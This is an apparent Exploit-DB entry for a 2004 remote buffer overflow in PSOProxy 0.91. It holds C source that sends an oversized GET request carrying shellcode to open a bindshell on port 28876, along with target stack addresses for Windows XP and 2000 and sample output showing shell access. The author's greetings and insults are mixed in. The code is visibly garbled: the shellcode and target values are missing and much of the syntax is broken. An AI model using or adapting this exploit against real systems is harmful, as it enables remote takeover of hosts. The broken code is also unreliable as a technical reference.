PSOProxy 0.91 - Remote Buffer Overflow Exploit (Win2k/XP)

EDB-ID: 156 CVE: 2004-0313 OSVDB-ID: 4028
Verified: Author: Rave Published: 2004-02-26
Download Exploit: Source Raw Download Vulnerable App:

	 Copyright © Rosiello Security

 	      http www rosiello org

 -== Remote Exploit for PSOProxy version v0.91 ==--
 Code by: rave
 Date: Feb 2004
 Bug found by: Donato Ferrante

 There is a vulnerability found in the PSOProxy server.
 An attacker can execute arbitrary code exploiting remotely a buffer overflow.

	The exploit sends:

    GET / <1021 x A><adres of the shellcode><shellcode>

 This spawns a bindshell on the victim at port 28876..

 Usage <C:\>psoproxy-exploit.exe <target host> <target number>
 Target Number           Target Name                             Stack Adress
 =============           ===========                             ===========
 0                       Demo                                    0xBADC0DED
 1                       Windows XP Home Edtion SP1.             0x00D2FDDA
 2                       Windows XP Pro Edtion SP1.              0x00EDFDDC
 3                       Win2k Pro Edtion.                       0x00BBFDDC

 <C:\> psoproxy-exploit localhost 1
 [+] Winsock Inalized
 [+] Trying to connect to localhost:8080
 [+] socket inalized
 [+] Overflowing string is Prepared
 [+] Connected.
 [+] Overflowing string had been send

 <C:\> telnet localhost 28876
 Microsoft Windows XP [versie 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.


 Respect the law as we do!

   Special Tankz to:
   opy   { win2k 0wnage !! ty for lending me ur box }
   B0f   { Hope to work with u again in the futhure like we do all the time }
   Dragnet  { Always willing to help me out }
   Angelo  { Verry good maffio`so }

   Greetz go out to:
   Kajun  { Verry suportive guy }
   NrAziz { 0wns pakistan hax0r scene ! beware always say mr NrAziz }
   sloth  { good guy }
   Mercy  { Hope to see u soon }
   Netric security { }
   [+] All the hax0rs i forgot.

   Hate Messages:
   Ziphie { U didnt get mine bitch }

  OOh and Li0n7 voila fr {
  you're doing it all wrong, your exploit doesn't work!
  k/j man, keep on doing the good stuff and next time add some more stack adresses so
  it would work on other os`s...


Advisory at:


#include <stdio.h>
#include <winsock2.h>
#include <errno.h>
#include <windows.h>

// Darn fucking 1337 macro shit
#define ISIP(m) (!(inet_addr(m) ==-1))

#define offset 1024 //1024

struct remote_targets {
  char *os;
  unsigned long sh_addr;
} target [] ={
/* Option`s for your eyes only :D*/
    "Demo                        ",

    "Windows XP Home Edtion SP1. ",

    "Windows XP Pro Edtion SP1.  ",

    "Win2k Pro Edtion.          ",


//Bindcode spawns a binshell on port 28876 (Thanks to guys)
unsigned char  shellcode[] =

// now what would this button do ?
char *host_ip;
u_long get_ip(char *hostname)
 struct  hostent    *hp;

 if (ISIP(hostname)) return inet_addr(hostname);

  if ((hp = gethostbyname(hostname))==NULL)
  { perror ("[+] gethostbyname() failed check the existance of the host.\n");
    exit(-1); }

  return (inet_ntoa(*((struct in_addr *)hp->h_addr)));

/// oooh yeah uuuh right ....
int usage (char *what)
 int i;
  fprintf(stdout,"Copyright © Rosiello Security\n");
  fprintf(stdout,"Usage %s <target host> <target number>\n",what);
  fprintf(stdout,"Target Number\t\tTarget Name\t\t\t\tStack Adress\n");

  for (i=0;i < 4;i++)


int main(int argc,char **argv)


char buffer[offset*2]="get /",*ptr,*address;
int sd,oops,i,choise;
struct  sockaddr_in  ooh;

WSADATA wsadata;
WSAStartup(0x101, &wsadata);

if (argc < 2) usage(argv[0]);

fprintf(stdout,"[+] Winsock Inalized\n");

 /* Lets start making a litle setup
    Change the port if you have to */

 ooh.sin_addr.s_addr = inet_addr(get_ip(address));
    ooh.sin_port        = htons(8080);
    ooh.sin_family      = AF_INET;

fprintf(stdout,"[+] Trying to connect to %s:%d\n",address,8080);

// ok ok here`s ur sock()
 if (!sd<0) { fprintf(stderr,"[!] socket() failed.\n");exit (-1); }

 fprintf(stdout,"[+] socket inalized\n");

 /* initializing the expploiting buffer, read the file comments for the details */

for (i=strlen(buffer);i < offset;i++) *ptr++=(char)0x2e;
for (i=strlen(buffer);i < offset+6;i++) { *ptr++=(char)0xa; *ptr++=(char)0xd ;}

memcpy(buffer+strlen(buffer),((char *)&shellcode),strlen(shellcode));
memcpy(buffer+offset,((char *)&target[choise].sh_addr),3);

fprintf(stdout,"[+] Overflowing string is Prepared\n");

 // Knock knock ... hi i want to hook up with you
 oops=connect(sd, (struct sockaddr *)&ooh, sizeof( ooh ));
  if(oops!=0) { fprintf(stderr,"[!] connect() failed.\n"); exit(-1); }

// yep we are in :D
fprintf(stdout,"[+] Connected.\n");

// Sending some Dangerous stuff
i = send(sd,buffer,strlen(buffer),0);
if (!i <0) { fprintf (stdout,"[!] Send() failed\n"); exit (-1) ; }

fprintf(stdout,"[+] Overflowing string had been send\n");

/* May psoproxy rest in peace (have cold a nice one and telnet to <host>  28876

 <C:\> telnet localhost 28876
 Microsoft Windows XP [versie 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.


// the cleaners !!

// [EOF]
return 0;


// [2004-02-26]